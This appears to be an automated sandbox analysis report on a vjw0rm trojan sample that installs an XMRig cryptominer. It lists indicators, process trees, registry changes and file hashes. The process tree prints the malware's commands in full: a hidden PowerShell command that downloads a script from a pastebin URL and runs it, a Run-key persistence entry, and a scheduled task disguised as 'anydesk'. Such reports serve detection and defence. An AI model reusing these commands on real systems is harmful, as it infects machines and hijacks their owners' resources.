vjw0rm | 31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f

Analysis

max time kernel
158s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
14-02-2022 05:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe
Size

11.8MB
MD5

b3e7aa693426736a592f3c9285f4d43f
SHA1

ed1db0ceffef65fb93a0a7863dee7f3a0d5506d0
SHA256

31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f
SHA512

70a0434385a9dd336dcaf84a10716a8366d808cc5483401da054ad4ba017debf8e430a3803980167aedea9bc33322bcddb58fcaa2bd25e3eca15da5e12a2ed9d

Score

10^/10

vjw0rm xmrig miner persistence trojan upx worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://pastebin.com/raw/gC5dfjh9

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/1340-166-0x0000000000400000-0x0000000000A16000-memory.dmp	xmrig
behavioral2/memory/1340-169-0x0000000000401000-0x0000000000938000-memory.dmp	xmrig

Blocklisted process makes network request 9 IoCs

Processes:

WScript.exepowershell.execmd.exe

flow	pid	process
22	1680	WScript.exe
27	3424	powershell.exe
28	3424	powershell.exe
48	4472	cmd.exe
49	4472	cmd.exe
50	1680	WScript.exe
58	1680	WScript.exe
61	1680	WScript.exe
62	1680	WScript.exe

Executes dropped EXE 1 IoCs

Processes:

setup.exe

pid process

2484 setup.exe

pid	process
2484	setup.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/1340-162-0x0000000000400000-0x0000000000A16000-memory.dmp	upx
behavioral2/memory/1340-164-0x0000000000400000-0x0000000000A16000-memory.dmp	upx
behavioral2/memory/1340-165-0x0000000000400000-0x0000000000A16000-memory.dmp	upx
behavioral2/memory/1340-166-0x0000000000400000-0x0000000000A16000-memory.dmp	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 5 IoCs

Processes:

WScript.exeWScript.exewscript.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setup.js	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllm.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dllm.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NkeGMKDHuN.url	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\setup.js	WScript.exe

Loads dropped DLL 4 IoCs

Processes:

setup.exe

pid process

2484 setup.exe
2484 setup.exe
2484 setup.exe
2484 setup.exe

pid	process
2484	setup.exe
2484	setup.exe
2484	setup.exe
2484	setup.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dllm.vbs"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dllm.vbs"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.execmd.exe

description	pid	process	target process
PID 3424 set thread context of 4472	3424	powershell.exe	cmd.exe
PID 4472 set thread context of 1340	4472	cmd.exe	notepad.exe

Drops file in Windows directory 8 IoCs

Processes:

svchost.exeTiWorker.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\WinSxS\pending.xml	TiWorker.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2424 schtasks.exe

pid	process
2424	schtasks.exe

Modifies registry class 1 IoCs

Processes:

31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exesetup.execmd.exepowershell.exepowershell.exe

pid	process
3424	powershell.exe
2484	setup.exe
2484	setup.exe
3424	powershell.exe
4472	cmd.exe
4472	cmd.exe
2224	powershell.exe
2224	powershell.exe
2224	powershell.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
5116	powershell.exe
5116	powershell.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe
4472	cmd.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

pid	process
668

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exesvchost.exeTiWorker.exe

description	pid	process
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeShutdownPrivilege	3896	svchost.exe
Token: SeCreatePagefilePrivilege	3896	svchost.exe
Token: SeShutdownPrivilege	3896	svchost.exe
Token: SeCreatePagefilePrivilege	3896	svchost.exe
Token: SeShutdownPrivilege	3896	svchost.exe
Token: SeCreatePagefilePrivilege	3896	svchost.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe
Token: SeBackupPrivilege	4128	TiWorker.exe
Token: SeRestorePrivilege	4128	TiWorker.exe
Token: SeSecurityPrivilege	4128	TiWorker.exe

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exeWScript.execmd.exeWScript.exepowershell.execmd.execmd.exe

description	pid	process	target process
PID 4652 wrote to memory of 5052	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	WScript.exe
PID 4652 wrote to memory of 5052	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	WScript.exe
PID 4652 wrote to memory of 5052	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	WScript.exe
PID 4652 wrote to memory of 1680	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	WScript.exe
PID 4652 wrote to memory of 1680	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	WScript.exe
PID 4652 wrote to memory of 1680	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	WScript.exe
PID 4652 wrote to memory of 2484	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	setup.exe
PID 4652 wrote to memory of 2484	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	setup.exe
PID 4652 wrote to memory of 2484	4652	31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe	setup.exe
PID 5052 wrote to memory of 3060	5052	WScript.exe	cmd.exe
PID 5052 wrote to memory of 3060	5052	WScript.exe	cmd.exe
PID 5052 wrote to memory of 3060	5052	WScript.exe	cmd.exe
PID 3060 wrote to memory of 3424	3060	cmd.exe	powershell.exe
PID 3060 wrote to memory of 3424	3060	cmd.exe	powershell.exe
PID 3060 wrote to memory of 3424	3060	cmd.exe	powershell.exe
PID 1680 wrote to memory of 2424	1680	WScript.exe	schtasks.exe
PID 1680 wrote to memory of 2424	1680	WScript.exe	schtasks.exe
PID 1680 wrote to memory of 2424	1680	WScript.exe	schtasks.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 3424 wrote to memory of 4472	3424	powershell.exe	cmd.exe
PID 4472 wrote to memory of 5052	4472	cmd.exe	WScript.exe
PID 4472 wrote to memory of 5052	4472	cmd.exe	WScript.exe
PID 5052 wrote to memory of 2224	5052	WScript.exe	powershell.exe
PID 5052 wrote to memory of 2224	5052	WScript.exe	powershell.exe
PID 5052 wrote to memory of 2224	5052	WScript.exe	powershell.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 1340	4472	cmd.exe	notepad.exe
PID 4472 wrote to memory of 2112	4472	cmd.exe	cmd.exe
PID 4472 wrote to memory of 2112	4472	cmd.exe	cmd.exe
PID 4472 wrote to memory of 2112	4472	cmd.exe	cmd.exe
PID 2112 wrote to memory of 4396	2112	cmd.exe	wscript.exe
PID 2112 wrote to memory of 4396	2112	cmd.exe	wscript.exe
PID 2112 wrote to memory of 4396	2112	cmd.exe	wscript.exe
PID 5052 wrote to memory of 5116	5052	WScript.exe	powershell.exe
PID 5052 wrote to memory of 5116	5052	WScript.exe	powershell.exe
PID 5052 wrote to memory of 5116	5052	WScript.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe
"C:\Users\Admin\AppData\Local\Temp\31ac877d8c2c2a897eaff36b17d755466b8612ad2661510dd6b0d9484a2b1f6f.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4652

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dllm.vbs"
2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/gC5dfjh9'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead($webClient.DownloadString('https://pastebin.com/raw/gC5dfjh9'));[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; runnull -exit
4⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\SysWOW64\cmd.exe"
5⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4472

C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -c "C:\ProgramData\GNUQlUqfKY\cfgi"
6⤵
PID:1340

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C WScript "C:\ProgramData\GNUQlUqfKY\r.vbs"
6⤵
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\SysWOW64\wscript.exe
WScript "C:\ProgramData\GNUQlUqfKY\r.vbs"
7⤵
- Drops startup file
PID:4396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value 'C:\Users\Admin\AppData\Local\Temp\dllm.vbs'
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:2224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Value 'C:\Users\Admin\AppData\Local\Temp\dllm.vbs'
3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
PID:5116

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\setup.js"
2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn anydesk /tr "C:\Users\Admin\AppData\Local\Temp\setup.js
3⤵
- Creates scheduled task(s)
PID:2424

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:4128

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\GNUQlUqfKY\cfgi
MD5
2c676207f99b23f3554e7876a116b66c

SHA1
6cf4edfc56faee2a135c868319ae946817a2ca74

SHA256
d722486f21c704671bf6e9a7ff6b842af810b75378afc21ed64c8e488ca649e6

SHA512
30d1bb0307f69e107c687f6331810a3f9fcecd3c1a7c8e75b94828cd17f18421017aa6ed504acc95c1e2a71256e12a952473a7567f331e118db4de76e75b01fe

Download Submit
C:\ProgramData\GNUQlUqfKY\r.vbs
MD5
a5a111d49c4a7f06ca0f3a6910d7f3f1

SHA1
96f8134fbdf1f17bcba3c165ffe0fcd0010a796c

SHA256
6e1529f62bf755b9720f539b4a5541bf4b4766f676eb3385749ab0cf8486536d

SHA512
e6bf8ae89a0068f550d22567ba5f4883fd7973cb0bfd358f77fa1d38782bf125cac34d2b598e8304bfa7dab0e3a3863eb2c4ebc151d58e81db0dba332367f0b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
47ad785a164d8ff087b5fc8372b82520

SHA1
f23b4ab647065004331d06eb701783f4c89a74dd

SHA256
03c404532d410575bc3c3aeb45e8c3f0156801f985eb66111aee0672e682155a

SHA512
c6e9e7d2b8148432dc274966915c6a0c801a44f1b40fa17fa88a185243087606986befe3f19ba16953aa6d6d7e57788a6a265c105d01deae7bd154313f4985a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
ef7144a2e315e5734383e825bf93236d

SHA1
21f50f98ea5b2cba55dde9cda013328b6e083c75

SHA256
6f02237fd3daa250c7b7c2826b97bdf73278ad89da74407996d80888699ea1c6

SHA512
f6cfb7a7954f5156707c1eea81933e6f4c7e22fcf68237d4e93e9b1f0a861aa9987c138a16d7af0beeb370d2cedd5a06716fd40ae9a72efe40a58d5f4445d386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
f0c3d6b2a04a5717b8daf2fc0fe92666

SHA1
5f1af14a1f00039bf4f7c23d0775fe5034092b4c

SHA256
26b99597b0a41e4a9be63e73fd4af190cd2cea46a3c6334b865465953fa11163

SHA512
6e2017778bd7ff36e38356448d0a86ed118c76c847ef062d93f325422b1a277d3614dd5633ac9a08e69876a780fb96438ecbc9abbff47b71da8f84f4621d0173

Download Submit
C:\Users\Admin\AppData\Local\Temp\dllm.vbs
MD5
fd820480df12caf43951f5f89f8deefc

SHA1
c6a2c1f8a24282c10228ca332accf97da37f86ef

SHA256
705646f923a2412757bae71b60de0fef31284756768a59ef2057eaee7dfafe9f

SHA512
0e8601194dbe56933c57805a59624b11414cfbdced46e45d874f5e3e43bd4d7195e650b22d2c783a041e3725168e593ab823b399f995fe6960c3e3eb597a8f36

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsm9152.tmp\LangDLL.dll
MD5
ab1db56369412fe8476fefffd11e4cc0

SHA1
daad036a83b2ee2fa86d840a34a341100552e723

SHA256
6f14c8f01f50a30743dac68c5ac813451463dfb427eb4e35fcdfe2410e1a913b

SHA512
8d886643b4fc24adf78f76b663227d6e61863f89e0cbd49548f40dd040666ca94ea46bec9e336850e4f300995d56e6dc85b689c8e09ff46758822d280f06b03d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsm9152.tmp\System.dll
MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsm9152.tmp\System.dll
MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsm9152.tmp\nsDialogs.dll
MD5
466179e1c8ee8a1ff5e4427dbb6c4a01

SHA1
eb607467009074278e4bd50c7eab400e95ae48f7

SHA256
1e40211af65923c2f4fd02ce021458a7745d28e2f383835e3015e96575632172

SHA512
7508a29c722d45297bfb090c8eb49bd1560ef7d4b35413f16a8aed62d3b1030a93d001a09de98c2b9fea9acf062dc99a7278786f4ece222e7436b261d14ca817

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
MD5
657ac7f61bec63c21564b049b080ee02

SHA1
500dea6799a3896d87dce4325f27fea7b49c6d8d

SHA256
c0cadafa382efefe3dd51ef5b5b8742886b92a9b19d8cb566df208092df8d830

SHA512
f702b35f18be1eef3808dfcdf7d8a110253bd456791a65697d3ef680c6ffb72fb5824f4ca8eb1cb1e6403f1604043be8aed37d6cb8c20667c05e21e3e54b657c

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe
MD5
657ac7f61bec63c21564b049b080ee02

SHA1
500dea6799a3896d87dce4325f27fea7b49c6d8d

SHA256
c0cadafa382efefe3dd51ef5b5b8742886b92a9b19d8cb566df208092df8d830

SHA512
f702b35f18be1eef3808dfcdf7d8a110253bd456791a65697d3ef680c6ffb72fb5824f4ca8eb1cb1e6403f1604043be8aed37d6cb8c20667c05e21e3e54b657c

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.js
MD5
105a99610e0130f583a50a9e2fdaeafa

SHA1
783cb3e9264a255244349c4388ace41b3a2ec497

SHA256
a8dbcfebb709ccb40a3e54d7da9c04c2ba8498ae284d013ed6aa8acc819d751e

SHA512
a50de4256f3c0cb724e1e02b7b55497a60b8b1d71ed09bccd38cb7dec3703726c5a6cad58c895e0fede8ddb97b415e3cfd55aee3cbe2460209f36bf93a566d73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NkeGMKDHuN.url
MD5
4e08a19771d3104587b2f51787a026c8

SHA1
870e9851c2975f3368d353d6c928453a22437078

SHA256
4ea284524cfbc3bf26bc4fd02906fd82f9cef55aab72faa7904db48d97e4e27c

SHA512
47895a848f3c540a99974f98caa4b1e1a7a03003bfd52b3b35ccb733daf558416bf5523e076032f3f87dce01766a682a188b5b5f37e0bf212a6e468a0c574a88

Download Submit
memory/1340-168-0x0000000000938000-0x0000000000A15000-memory.dmp

Filesize
884KB

Download
memory/1340-162-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/1340-178-0x0000029D0F630000-0x0000029D0F650000-memory.dmp

Filesize
128KB

Download
memory/1340-175-0x0000029D0F610000-0x0000029D0F630000-memory.dmp

Filesize
128KB

Download
memory/1340-169-0x0000000000401000-0x0000000000938000-memory.dmp

Filesize
5.2MB

Download
memory/1340-167-0x0000029D0F5D0000-0x0000029D0F5E4000-memory.dmp

Filesize
80KB

Download
memory/1340-166-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/1340-165-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/1340-164-0x0000000000400000-0x0000000000A16000-memory.dmp

Filesize
6.1MB

Download
memory/2224-173-0x00000000078A0000-0x00000000078C2000-memory.dmp

Filesize
136KB

Download
memory/2224-160-0x0000000002DE0000-0x0000000002DE1000-memory.dmp

Filesize
4KB

Download
memory/2224-174-0x0000000007F20000-0x00000000084C4000-memory.dmp

Filesize
5.6MB

Download
memory/2224-172-0x0000000002DE5000-0x0000000002DE7000-memory.dmp

Filesize
8KB

Download
memory/2224-171-0x00000000078D0000-0x0000000007966000-memory.dmp

Filesize
600KB

Download
memory/2224-161-0x0000000002DE2000-0x0000000002DE3000-memory.dmp

Filesize
4KB

Download
memory/2224-159-0x00000000721EE000-0x00000000721EF000-memory.dmp

Filesize
4KB

Download
memory/3424-137-0x0000000002920000-0x0000000002956000-memory.dmp

Filesize
216KB

Download
memory/3424-147-0x0000000004E75000-0x0000000004E77000-memory.dmp

Filesize
8KB

Download
memory/3424-153-0x0000000018100000-0x000000001819C000-memory.dmp

Filesize
624KB

Download
memory/3424-152-0x00000000067A0000-0x00000000067BA000-memory.dmp

Filesize
104KB

Download
memory/3424-151-0x0000000007A80000-0x00000000080FA000-memory.dmp

Filesize
6.5MB

Download
memory/3424-136-0x0000000004E70000-0x0000000004E71000-memory.dmp

Filesize
4KB

Download
memory/3424-140-0x0000000005190000-0x00000000051B2000-memory.dmp

Filesize
136KB

Download
memory/3424-139-0x0000000004E72000-0x0000000004E73000-memory.dmp

Filesize
4KB

Download
memory/3424-146-0x0000000006240000-0x000000000625E000-memory.dmp

Filesize
120KB

Download
memory/3424-138-0x00000000054B0000-0x0000000005AD8000-memory.dmp

Filesize
6.2MB

Download
memory/3424-141-0x0000000005B90000-0x0000000005BF6000-memory.dmp

Filesize
408KB

Download
memory/3424-135-0x00000000721EE000-0x00000000721EF000-memory.dmp

